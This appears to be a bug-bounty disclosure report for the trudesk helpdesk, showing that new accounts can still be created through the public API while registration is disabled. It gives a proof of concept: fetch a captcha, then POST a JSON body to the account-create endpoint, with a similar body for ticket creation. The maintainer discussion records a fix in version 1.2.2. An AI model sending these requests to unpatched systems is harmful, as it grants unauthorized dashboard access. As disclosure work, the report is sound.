Register users in spite of Allow User Registration disabled in polonel/trudesk

Valid

Reported on

May 12th 2022

Description

Attacker can register a user in spite of the Allow User Registration is disable by default.

Proof of Concept

  1. Go to /captcha, get the captcha value and cookie. alt text
  2. Send POST request to (/api/v1/public/account/create) with the value of captcha and cookie in step 1.
    //POST HOST/api/v1/public/account/create
{
    "user": {
        "fullname": "uname",
        "email": "test@gmail.com",
        "password": "passwd"
    },
    "captcha": "captcha"
}

alt text

  1. Register successfuly.

Note

Same POC with endpoint Create New Ticket(/api/v1/public/tickets/create)

{"user":{"fullname":"tpa tpa2","email":"test@gmail.com"},"ticket":{"subject":"123","issue":"123"},"captcha":"Dazr"}

Impact

Attacker can register a user and get inside the dashboard.

We are processing your report and will contact the polonel/trudesk team within 24 hours. a year ago
tienpa99 modified the report
a year ago
tienpa99 modified the report
a year ago
tienpa99 modified the report
a year ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back a year ago
Chris
a year ago

Maintainer

Can you try the same request once you log out of the app as yourself? It's using your permissions since you're logged in.

Chris
a year ago

Maintainer

Actually, I see the issue. I will publish a fix soon.

Chris validated this vulnerability a year ago
tienpa99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. a year ago
Chris marked this as fixed in 1.2.2 with commit 49befa a year ago
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE
tienpa99
a year ago

Researcher

Confirm the bug has been fixed.

to join this conversation